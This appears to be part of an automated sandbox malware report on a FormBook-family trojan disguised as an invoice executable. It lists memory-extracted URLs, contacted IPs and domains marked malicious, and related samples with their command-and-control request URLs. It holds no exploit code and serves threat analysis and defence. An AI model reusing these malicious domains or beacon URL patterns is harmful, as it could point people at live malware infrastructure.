                                              https://assets.iv.lt/header.htmlreplace.exe, 00000005.00000002.2891299160.0000000004054000.00000004.10000000.00040000.00000000.sdmp, replace.exe, 00000005.00000002.2892941686.0000000006440000.00000004.00000800.00020000.00000000.sdmp, JlRhrxMCYjuGzWWvXkXNzhLX.exe, 00000008.00000002.2890729672.0000000002A44000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2208939034.0000000028154000.00000004.80000000.00040000.00000000.sdmpfalse
                                                		high
                                                https://duckduckgo.com/ac/?q=replace.exe, 00000005.00000003.2093471603.0000000007EC8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://www.arsys.es?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=arsysreplace.exe, 00000005.00000002.2891299160.000000000450A000.00000004.10000000.00040000.00000000.sdmp, JlRhrxMCYjuGzWWvXkXNzhLX.exe, 00000008.00000002.2890729672.0000000002EFA000.00000004.00000001.00040000.00000000.sdmpfalse
                                                    		high
                                                    https://www.arsys.es/servidores/cloud?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=cloudreplace.exe, 00000005.00000002.2891299160.000000000450A000.00000004.10000000.00040000.00000000.sdmp, JlRhrxMCYjuGzWWvXkXNzhLX.exe, 00000008.00000002.2890729672.0000000002EFA000.00000004.00000001.00040000.00000000.sdmpfalse
                                                      		high
                                                      https://www.arsys.es/servidores/dedicados?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=dereplace.exe, 00000005.00000002.2891299160.000000000450A000.00000004.10000000.00040000.00000000.sdmp, JlRhrxMCYjuGzWWvXkXNzhLX.exe, 00000008.00000002.2890729672.0000000002EFA000.00000004.00000001.00040000.00000000.sdmpfalse
                                                        		high
                                                        https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=replace.exe, 00000005.00000003.2093471603.0000000007EC8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://www.iv.lt/domenai/replace.exe, 00000005.00000002.2891299160.0000000004054000.00000004.10000000.00040000.00000000.sdmp, replace.exe, 00000005.00000002.2892941686.0000000006440000.00000004.00000800.00020000.00000000.sdmp, JlRhrxMCYjuGzWWvXkXNzhLX.exe, 00000008.00000002.2890729672.0000000002A44000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2208939034.0000000028154000.00000004.80000000.00040000.00000000.sdmpfalse
                                                            		high
                                                            https://assets.iv.lt/default.cssreplace.exe, 00000005.00000002.2891299160.0000000004054000.00000004.10000000.00040000.00000000.sdmp, replace.exe, 00000005.00000002.2892941686.0000000006440000.00000004.00000800.00020000.00000000.sdmp, JlRhrxMCYjuGzWWvXkXNzhLX.exe, 00000008.00000002.2890729672.0000000002A44000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2208939034.0000000028154000.00000004.80000000.00040000.00000000.sdmpfalse
                                                              		high
                                                              https://assets.iv.lt/images/icon.pngfirefox.exe, 00000009.00000002.2208939034.0000000028154000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                		high
                                                                https://www.arsys.es/herramientas/sms?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=smsreplace.exe, 00000005.00000002.2891299160.000000000450A000.00000004.10000000.00040000.00000000.sdmp, JlRhrxMCYjuGzWWvXkXNzhLX.exe, 00000008.00000002.2890729672.0000000002EFA000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                  		high
                                                                  https://www.arsys.es/soluciones?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=solutionsreplace.exe, 00000005.00000002.2891299160.000000000450A000.00000004.10000000.00040000.00000000.sdmp, JlRhrxMCYjuGzWWvXkXNzhLX.exe, 00000008.00000002.2890729672.0000000002EFA000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                    		high
                                                                    https://assets.iv.lt/images/thumbnail.pngfirefox.exe, 00000009.00000002.2208939034.0000000028154000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                      		high
                                                                      https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchreplace.exe, 00000005.00000003.2093471603.0000000007EC8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://www.iv.lt/duomenu-centras/replace.exe, 00000005.00000002.2891299160.0000000004054000.00000004.10000000.00040000.00000000.sdmp, replace.exe, 00000005.00000002.2892941686.0000000006440000.00000004.00000800.00020000.00000000.sdmp, JlRhrxMCYjuGzWWvXkXNzhLX.exe, 00000008.00000002.2890729672.0000000002A44000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2208939034.0000000028154000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                          		high
                                                                          https://www.arsys.es/backup?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=backupreplace.exe, 00000005.00000002.2891299160.000000000450A000.00000004.10000000.00040000.00000000.sdmp, JlRhrxMCYjuGzWWvXkXNzhLX.exe, 00000008.00000002.2890729672.0000000002EFA000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                            		high
                                                                            https://www.arsys.es/hosting?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=hostingreplace.exe, 00000005.00000002.2891299160.000000000450A000.00000004.10000000.00040000.00000000.sdmp, JlRhrxMCYjuGzWWvXkXNzhLX.exe, 00000008.00000002.2890729672.0000000002EFA000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                              		high
                                                                              https://www.arsys.es/hosting/wordpress?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=wordpreplace.exe, 00000005.00000002.2891299160.000000000450A000.00000004.10000000.00040000.00000000.sdmp, JlRhrxMCYjuGzWWvXkXNzhLX.exe, 00000008.00000002.2890729672.0000000002EFA000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                		high
                                                                                https://www.iv.lt/profesionalus-hostingas/replace.exe, 00000005.00000002.2891299160.0000000004054000.00000004.10000000.00040000.00000000.sdmp, replace.exe, 00000005.00000002.2892941686.0000000006440000.00000004.00000800.00020000.00000000.sdmp, JlRhrxMCYjuGzWWvXkXNzhLX.exe, 00000008.00000002.2890729672.0000000002A44000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2208939034.0000000028154000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                                  		high
                                                                                  https://www.arsys.es/dominios/buscar?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=dominioreplace.exe, 00000005.00000002.2891299160.000000000450A000.00000004.10000000.00040000.00000000.sdmp, JlRhrxMCYjuGzWWvXkXNzhLX.exe, 00000008.00000002.2890729672.0000000002EFA000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                    		high
                                                                                    https://www.iv.lt/talpinimo-planai/replace.exe, 00000005.00000002.2891299160.0000000004054000.00000004.10000000.00040000.00000000.sdmp, replace.exe, 00000005.00000002.2892941686.0000000006440000.00000004.00000800.00020000.00000000.sdmp, JlRhrxMCYjuGzWWvXkXNzhLX.exe, 00000008.00000002.2890729672.0000000002A44000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2208939034.0000000028154000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                                      		high
                                                                                      https://www.arsys.es/dominios/gestion?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=resellreplace.exe, 00000005.00000002.2891299160.000000000450A000.00000004.10000000.00040000.00000000.sdmp, JlRhrxMCYjuGzWWvXkXNzhLX.exe, 00000008.00000002.2890729672.0000000002EFA000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                        		high
                                                                                        https://www.arsys.es/dominios/ssl?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=sslreplace.exe, 00000005.00000002.2891299160.000000000450A000.00000004.10000000.00040000.00000000.sdmp, JlRhrxMCYjuGzWWvXkXNzhLX.exe, 00000008.00000002.2890729672.0000000002EFA000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                          		high
                                                                                          https://www.google.com/images/branding/product/ico/googleg_lodp.icoreplace.exe, 00000005.00000003.2093471603.0000000007EC8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            https://assets.iv.lt/footer.htmlreplace.exe, 00000005.00000002.2891299160.0000000004054000.00000004.10000000.00040000.00000000.sdmp, replace.exe, 00000005.00000002.2892941686.0000000006440000.00000004.00000800.00020000.00000000.sdmp, JlRhrxMCYjuGzWWvXkXNzhLX.exe, 00000008.00000002.2890729672.0000000002A44000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2208939034.0000000028154000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                                              		high
                                                                                              http://www.skibinscy-finanse.plJlRhrxMCYjuGzWWvXkXNzhLX.exe, 00000008.00000002.2892203666.0000000004B0E000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                                                		unknown
                                                                                                https://www.arsys.es/servidores/vps?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=vpsreplace.exe, 00000005.00000002.2891299160.000000000450A000.00000004.10000000.00040000.00000000.sdmp, JlRhrxMCYjuGzWWvXkXNzhLX.exe, 00000008.00000002.2890729672.0000000002EFA000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=replace.exe, 00000005.00000003.2093471603.0000000007EC8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    https://www.iv.lt/neribotas-svetainiu-talpinimas/replace.exe, 00000005.00000002.2891299160.0000000004054000.00000004.10000000.00040000.00000000.sdmp, replace.exe, 00000005.00000002.2892941686.0000000006440000.00000004.00000800.00020000.00000000.sdmp, JlRhrxMCYjuGzWWvXkXNzhLX.exe, 00000008.00000002.2890729672.0000000002A44000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2208939034.0000000028154000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      https://www.iv.lt/replace.exe, 00000005.00000002.2891299160.0000000004054000.00000004.10000000.00040000.00000000.sdmp, replace.exe, 00000005.00000002.2892941686.0000000006440000.00000004.00000800.00020000.00000000.sdmp, JlRhrxMCYjuGzWWvXkXNzhLX.exe, 00000008.00000002.2890729672.0000000002A44000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2208939034.0000000028154000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        https://www.iv.lt/svetainiu-kurimo-irankis/replace.exe, 00000005.00000002.2891299160.0000000004054000.00000004.10000000.00040000.00000000.sdmp, replace.exe, 00000005.00000002.2892941686.0000000006440000.00000004.00000800.00020000.00000000.sdmp, JlRhrxMCYjuGzWWvXkXNzhLX.exe, 00000008.00000002.2890729672.0000000002A44000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2208939034.0000000028154000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                                                          		high
                                                                                                          https://www.arsys.es/crear/tienda?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=tiendasreplace.exe, 00000005.00000002.2891299160.000000000450A000.00000004.10000000.00040000.00000000.sdmp, JlRhrxMCYjuGzWWvXkXNzhLX.exe, 00000008.00000002.2890729672.0000000002EFA000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                            		high
                                                                                                            https://cgqbbu1mvnevcxzh.appreplace.exe, 00000005.00000002.2891299160.000000000469C000.00000004.10000000.00040000.00000000.sdmp, JlRhrxMCYjuGzWWvXkXNzhLX.exe, 00000008.00000002.2890729672.000000000308C000.00000004.00000001.00040000.00000000.sdmpfalseunknown
                                                                                                            https://www.ecosia.org/newtab/replace.exe, 00000005.00000003.2093471603.0000000007EC8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              		high
                                                                                                              https://www.chiark.greenend.org.uk/~sgtatham/putty/0HYCO_Invoices MS2 & MS3.exefalse
                                                                                                              • URL Reputation: safe
                                                                                                              		unknown
                                                                                                              https://www.arsys.es/partners?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=partnersreplace.exe, 00000005.00000002.2891299160.000000000450A000.00000004.10000000.00040000.00000000.sdmp, JlRhrxMCYjuGzWWvXkXNzhLX.exe, 00000008.00000002.2890729672.0000000002EFA000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                		high
                                                                                                                https://www.arsys.es/dominios?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=dominiosreplace.exe, 00000005.00000002.2891299160.000000000450A000.00000004.10000000.00040000.00000000.sdmp, JlRhrxMCYjuGzWWvXkXNzhLX.exe, 00000008.00000002.2890729672.0000000002EFA000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                  		high
                                                                                                                  https://www.iv.lt/el-pasto-filtras/replace.exe, 00000005.00000002.2891299160.0000000004054000.00000004.10000000.00040000.00000000.sdmp, replace.exe, 00000005.00000002.2892941686.0000000006440000.00000004.00000800.00020000.00000000.sdmp, JlRhrxMCYjuGzWWvXkXNzhLX.exe, 00000008.00000002.2890729672.0000000002A44000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2208939034.0000000028154000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                                                                    		high
                                                                                                                    https://ac.ecosia.org/autocomplete?q=replace.exe, 00000005.00000003.2093471603.0000000007EC8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      		high
                                                                                                                      https://www.arsys.es/herramientas/seo?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=seoreplace.exe, 00000005.00000002.2891299160.000000000450A000.00000004.10000000.00040000.00000000.sdmp, JlRhrxMCYjuGzWWvXkXNzhLX.exe, 00000008.00000002.2890729672.0000000002EFA000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                        		high
                                                                                                                        https://www.iv.lt/vps-serveriai/replace.exe, 00000005.00000002.2891299160.0000000004054000.00000004.10000000.00040000.00000000.sdmp, replace.exe, 00000005.00000002.2892941686.0000000006440000.00000004.00000800.00020000.00000000.sdmp, JlRhrxMCYjuGzWWvXkXNzhLX.exe, 00000008.00000002.2890729672.0000000002A44000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2208939034.0000000028154000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                                                                          		high
                                                                                                                          https://www.arsys.es/correo?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=correoreplace.exe, 00000005.00000002.2891299160.000000000450A000.00000004.10000000.00040000.00000000.sdmp, JlRhrxMCYjuGzWWvXkXNzhLX.exe, 00000008.00000002.2890729672.0000000002EFA000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                            		high
                                                                                                                            https://klientams.iv.lt/replace.exe, 00000005.00000002.2891299160.0000000004054000.00000004.10000000.00040000.00000000.sdmp, replace.exe, 00000005.00000002.2892941686.0000000006440000.00000004.00000800.00020000.00000000.sdmp, JlRhrxMCYjuGzWWvXkXNzhLX.exe, 00000008.00000002.2890729672.0000000002A44000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2208939034.0000000028154000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                                                                              		high
                                                                                                                              https://arsys.es/css/parking2.cssreplace.exe, 00000005.00000002.2891299160.000000000450A000.00000004.10000000.00040000.00000000.sdmp, JlRhrxMCYjuGzWWvXkXNzhLX.exe, 00000008.00000002.2890729672.0000000002EFA000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                		high
                                                                                                                                https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=replace.exe, 00000005.00000003.2093471603.0000000007EC8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  		high
                                                                                                                                  https://www.arsys.es/hosting/revendedores?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=rereplace.exe, 00000005.00000002.2891299160.000000000450A000.00000004.10000000.00040000.00000000.sdmp, JlRhrxMCYjuGzWWvXkXNzhLX.exe, 00000008.00000002.2890729672.0000000002EFA000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                    		high
                                                                                                                                    https://www.iv.lt/sertifikatai/replace.exe, 00000005.00000002.2891299160.0000000004054000.00000004.10000000.00040000.00000000.sdmp, replace.exe, 00000005.00000002.2892941686.0000000006440000.00000004.00000800.00020000.00000000.sdmp, JlRhrxMCYjuGzWWvXkXNzhLX.exe, 00000008.00000002.2890729672.0000000002A44000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2208939034.0000000028154000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                                                                                      		high

                                                                                                                                      World Map of Contacted IPs

                                                                                                                                      • No. of IPs < 25%
                                                                                                                                      • 25% < No. of IPs < 50%
                                                                                                                                      • 50% < No. of IPs < 75%
                                                                                                                                      • 75% < No. of IPs

                                                                                                                                      Public IPs

                                                                                                                                      IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                      91.195.240.117
                                                                                                                                      		www.avoshield.comGermany
                                                                                                                                      		47846SEDO-ASDEtrue
                                                                                                                                      79.98.25.1
                                                                                                                                      		www.maxiwalls.comLithuania
                                                                                                                                      		62282RACKRAYUABRakrejusLTtrue
                                                                                                                                      217.76.128.34
                                                                                                                                      		www.colchondealquiler.comSpain
                                                                                                                                      		8560ONEANDONE-ASBrauerstrasse48DEtrue
                                                                                                                                      178.211.137.59
                                                                                                                                      		www.skibinscy-finanse.plUkraine
                                                                                                                                      		31214TIS-DIALOG-ASRUtrue
                                                                                                                                      64.190.62.22
                                                                                                                                      		www.paydayloans3.shopUnited States
                                                                                                                                      		11696NBS11696UStrue
                                                                                                                                      52.175.38.24
                                                                                                                                      		fix01.pfw.djamxtvyk.cloudland3.comUnited States
                                                                                                                                      		8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse

                                                                                                                                      General Information

                                                                                                                                      Joe Sandbox version:40.0.0 Tourmaline
                                                                                                                                      Analysis ID:1427199
                                                                                                                                      Start date and time:2024-04-17 08:37:49 +02:00
                                                                                                                                      Joe Sandbox product:CloudBasic
                                                                                                                                      Overall analysis duration:0h 8m 55s
                                                                                                                                      Hypervisor based Inspection enabled:false
                                                                                                                                      Report type:full
                                                                                                                                      Cookbook file name:default.jbs
                                                                                                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                      Number of analysed new started processes analysed:9
                                                                                                                                      Number of new started drivers analysed:0
                                                                                                                                      Number of existing processes analysed:0
                                                                                                                                      Number of existing drivers analysed:0
                                                                                                                                      Number of injected processes analysed:2
                                                                                                                                      Technologies:
                                                                                                                                      • HCA enabled
                                                                                                                                      • EGA enabled
                                                                                                                                      • AMSI enabled
                                                                                                                                      Analysis Mode:default
                                                                                                                                      Analysis stop reason:Timeout
                                                                                                                                      Sample name:HYCO_Invoices MS2 & MS3.exe
                                                                                                                                      Detection:MAL
                                                                                                                                      Classification:mal100.troj.spyw.evad.winEXE@9/2@7/6
                                                                                                                                      EGA Information:
                                                                                                                                      • Successful, ratio: 75%
                                                                                                                                      HCA Information:
                                                                                                                                      • Successful, ratio: 87%
                                                                                                                                      • Number of executed functions: 65
                                                                                                                                      • Number of non-executed functions: 269
                                                                                                                                      Cookbook Comments:
                                                                                                                                      • Found application associated with file extension: .exe

                                                                                                                                      Warnings

                                                                                                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                                                                                      • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                                      • Not all processes where analyzed, report is missing behavior information
                                                                                                                                      • Report creation exceeded maximum time and may have missing disassembly code information.

                                                                                                                                      Simulations

                                                                                                                                      Behavior and APIs

                                                                                                                                      TimeTypeDescription
                                                                                                                                      08:38:34API Interceptor1x Sleep call for process: HYCO_Invoices MS2 & MS3.exe modified
                                                                                                                                      08:39:38API Interceptor2189389x Sleep call for process: replace.exe modified

                                                                                                                                      Joe Sandbox View / Context

                                                                                                                                      IPs

                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                      91.195.240.117RFQ.exeGet hashmaliciousFormBookBrowse
                                                                                                                                      • www.blueberry-breeze.com/bnz5/
                                                                                                                                      HSBC Advice_pdf.vbsGet hashmaliciousFormBookBrowse
                                                                                                                                      • www.heavydripluxury.com/avr4/
                                                                                                                                      BL4567GH67_xls.exeGet hashmaliciousFormBookBrowse
                                                                                                                                      • www.thegoldengirlsshop.com/n8t5/
                                                                                                                                      W9PJhOS2if.exeGet hashmaliciousDarkTortilla, FormBookBrowse
                                                                                                                                      • www.vaesen.net/h2uv/
                                                                                                                                      DHL 986022_pdf.vbsGet hashmaliciousFormBookBrowse
                                                                                                                                      • www.heavydripluxury.com/avr4/
                                                                                                                                      KCS20240042- cutoms clearance doc.exeGet hashmaliciousFormBookBrowse
                                                                                                                                      • www.modelmotoringco.com/gh9e/
                                                                                                                                      Scan Document Copy_docx.exeGet hashmaliciousFormBookBrowse
                                                                                                                                      • www.thegoldengirlsshop.com/n8t5/
                                                                                                                                      TNT Invoice 09004105_pdf.vbsGet hashmaliciousFormBookBrowse
                                                                                                                                      • www.heavydripluxury.com/avr4/
                                                                                                                                      ungziped_file.exeGet hashmaliciousFormBookBrowse
                                                                                                                                      • www.thegoldengirlsshop.com/n8t5/
                                                                                                                                      33BMmt58Bj.exeGet hashmaliciousFormBookBrowse
                                                                                                                                      • www.vicatti.com/dhra/
                                                                                                                                      79.98.25.1International Bank Transfer.exeGet hashmaliciousFormBookBrowse
                                                                                                                                      • www.noxnoxhome.com/ve92/?KVvTZtEp=3Lb7GTp0i1UWz50Z1NTpZr264EbzejLIOiMk55K1X/ijp3vnWUvEjglcNSm79P5Sc0NLZLCPEw==&ixo=GL0X
                                                                                                                                      International Bank transfer.exeGet hashmaliciousFormBookBrowse
                                                                                                                                      • www.noxnoxhome.com/ve92/?UTU=yvUt0Xc&NtBTjpl=3Lb7GTp0i1UWz50Z1NTpZr264EbzejLIOiMk55K1X/ijp3vnWUvEjglcNReS0v1pTCwd
                                                                                                                                      00726736625241525.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                                                                                                                      • www.christmatoy.com/6qne/?T6d7v=45MeeAD4Y8e2mqpq44/Fvp9d3MZR+OOgjBrZQamPfzy89FNMTy66VAy6fvepqGkhnz/kvI1ROEM4MGyKOy/C+oTtjVbLxPInHRTKy1tLVwIe&P9I=5Nqp
                                                                                                                                      Ekli_fatura.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                                                                                                                      • www.christmatoy.com/6qne/?a_=u7nXv&67=45MeeAD4Y8e2mqpq44/Fvp9d3MZR+OOgjBrZQamPfzy89FNMTy66VAy6fvepqGkhnz/kvI1ROEM4MGyKOy/CzKXxpHTL6/QrDg==
                                                                                                                                      00023134214252615.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                                                                                                                      • www.christmatoy.com/6qne/?0hnL5J=45MeeAD4Y8e2mqpq44/Fvp9d3MZR+OOgjBrZQamPfzy89FNMTy66VAy6fvepqGkhnz/kvI1ROEM4MGyKOy/BqbXsjSn19dkaRA==&1d=iNJ5G
                                                                                                                                      Kopija_bankovne_uplate.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                                                                                                                      • www.christmatoy.com/6qne/?ibHgv7=x5rx0ZN3oO-G&wO8WV=45MeeAD4Y8e2mqpq44/Fvp9d3MZR+OOgjBrZQamPfzy89FNMTy66VAy6fvepqGkhnz/kvI1ROEM4MGyKOy/C+oTtjVbLxPInHRTKy1tLVwIe
                                                                                                                                      003786546788765.PDF.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                                                                                                                      • www.christmatoy.com/6qne/?F_4=9SV3rDO4hnDB&U3mb=45MeeAD4Y8e2mqpq44/Fvp9d3MZR+OOgjBrZQamPfzy89FNMTy66VAy6fvepqGkhnz/kvI1ROEM4MGyKOy/Bqbjoiin18dsOQQ==
                                                                                                                                      Copie_de_plata_bancara.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                                                                                                                      • www.christmatoy.com/6qne/?ILqh=0AsVJSkSvC6-W&yRBmiBA-=45MeeAD4Y8e2mqpl94/vp49GzIZF/JSgjBrZQamPfzy89FNMTy66VAy6fvepqGkhnz/kvI1ROEM4MGyKOy/BqZm0t1L18dsSRA==
                                                                                                                                      U_prilogu_je_predracun.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                                                                                                                      • www.christmatoy.com/6qne/?fk0=89DiTmjnfCUhvYsc&kJZ5QC=45MeeAD4Y8e2mqpq44/Fvp9d3MZR+OOgjBrZQamPfzy89FNMTy66VAy6fvepqGkhnz/kvI1ROEM4MGyKOy/CzKXxpHTL6/QrDg==
                                                                                                                                      Iqgbhvnaowuspb.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                                                                                                                      • www.christmatoy.com/6qne/?D15HD=_t_lMOKbpZu3O9&9WZHdBH=45MeeAD4Y8e2mqpq44/Fvp9d3MZR+OOgjBrZQamPfzy89FNMTy66VAy6fvepqGkhnz/kvI1ROEM4MGyKOy/CzITtjVbGwuQSRA==
                                                                                                                                      217.76.128.34OYT57DouoW.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                      • www.juanjosevallejo.com/fefu/?ut=sfpX1rF&-p_T=2l3W4VfmWsV4eZEAjEjeqAhHkL1dYelb6bWEAxbyPWKvG4aQFvMz8mpmVi5x2/+PgVsLhXwaVjZDfad0H2De7yx+VoeS9KIOSQ==
                                                                                                                                      Technical_Offer.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                      • www.juanjosevallejo.com/fefu/?1XjpS=4bALnjbxgpP&lnw8IrK=2l3W4VfmWsV4eZEBv0jbqApFialdMelb6bWEAxbyPWKvG4aQFvMz8mpmVi5x2/+PgVsLhXwaVjZDfad0H2De8zxjbIua8cAKUg==
                                                                                                                                      SO#69055.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                      • www.liquidimension.com/bb62/?z0Dpf0=qLsX/B+AsXst9YzrZ8aedxK6SrjOMxODZWGMiGD2wcGJ2EfpMRwVkU8McxOykttVha6o&7nYXR=YZYtSj
                                                                                                                                      Quotation for Taiwan.xlsxGet hashmaliciousFormBookBrowse
                                                                                                                                      • www.fructuosopascualehijos.net/goe8/?LVJ=WC6hBvQ3QeBqvAOx66vlMNUjxSot34YiIkKEUIfai1zuPIC2yxu3LJRxfHjjOxvNwW0mgQ==&WJBp=0jatx6Y0lVhld6yP
                                                                                                                                      BANKING_DETAILS.pdf.exeGet hashmaliciousFormBookBrowse
                                                                                                                                      • www.beroutes.com/bur5/?5j_Hvt=mCCXk+IKYk1iX4A1deob7ioHURnlh1wayUbavLAhQ3pe6d51JZ/clFL2gm9Ow5p6HVb9&X8OlGT=gJBhn4B0j24tyjt0
                                                                                                                                      RFQ-00495RMC-982.exeGet hashmaliciousFormBookBrowse
                                                                                                                                      • www.neteal.net/acp0/?K8FLp6=s48tEl5hO&KxoP6l1x=iFl8NE5XMhpQKR5pejgruCQb8qbX8dYgMThYnLcUnj0kcfa20qV9KwyGOmT5T3DoW2gw
                                                                                                                                      Purchase Order.exeGet hashmaliciousFormBookBrowse
                                                                                                                                      • www.pilatesvilanova.com/ecus/?0rh=r22qDs/46jroKumdVqE1N6zwprMXcfF0UY/TTFyOL6Zw3KO4BVEcxH2zZHlztvmI2tjz&6ln=U4ptDpS8
                                                                                                                                      payment advice_16000.exeGet hashmaliciousFormBookBrowse
                                                                                                                                      • www.fructuosopascualehijos.net/d6pu/?xV0Luzq=Hso/dNPdWjPDIs547RlY2yOHtK+lR6l/w4bhTwEa54TTpt6hNNxEbgOB17GSIgLG2h52F2DTdw==&m2MtDd=Q48xKP
                                                                                                                                      QUOTATION.exeGet hashmaliciousFormBookBrowse
                                                                                                                                      • www.fructuosopascualehijos.net/d6pu/?y6Ah=Hso/dNPdWjPDIs547RlY2yOHtK+lR6l/w4bhTwEa54TTpt6hNNxEbgOB17GSIgLG2h52F2DTdw==&SD=Kn0PFhqhflm8
                                                                                                                                      Rate - 5SLN - 03x 40 HC.pdf.exeGet hashmaliciousFormBookBrowse
                                                                                                                                      • www.ceoeempresassalmantinas.com/vtg0/?ojn4iL=JfyHBVgph40T&BjR=CogBnn9BestAFiA9QXlINj8vTJ6mniN5SJ0N+bnrhJuOzLBpUrNV0e9T7PEHhhKU34tR

                                                                                                                                      Domains

                                                                                                                                      No context

                                                                                                                                      ASNs

                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                      RACKRAYUABRakrejusLTpayment form.doc.bat.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                                                      • 185.5.53.18
                                                                                                                                      International Bank Transfer.exeGet hashmaliciousFormBookBrowse
                                                                                                                                      • 79.98.25.1
                                                                                                                                      International Bank transfer.exeGet hashmaliciousFormBookBrowse
                                                                                                                                      • 79.98.25.1
                                                                                                                                      4df902f11590d27189e9113ed654b0481.msiGet hashmaliciousUnknownBrowse
                                                                                                                                      • 212.24.99.48
                                                                                                                                      IMG001.exeGet hashmaliciousXmrigBrowse
                                                                                                                                      • 62.77.152.0
                                                                                                                                      S23UhdW5DH.exeGet hashmaliciousLummaC, Glupteba, SmokeLoader, Socks5Systemz, StealcBrowse
                                                                                                                                      • 194.135.86.146
                                                                                                                                      l3fh0T2H1h.exeGet hashmaliciousBazaLoader, SmokeLoaderBrowse
                                                                                                                                      • 80.209.233.177
                                                                                                                                      m03QyrzmCg.elfGet hashmaliciousGafgytBrowse
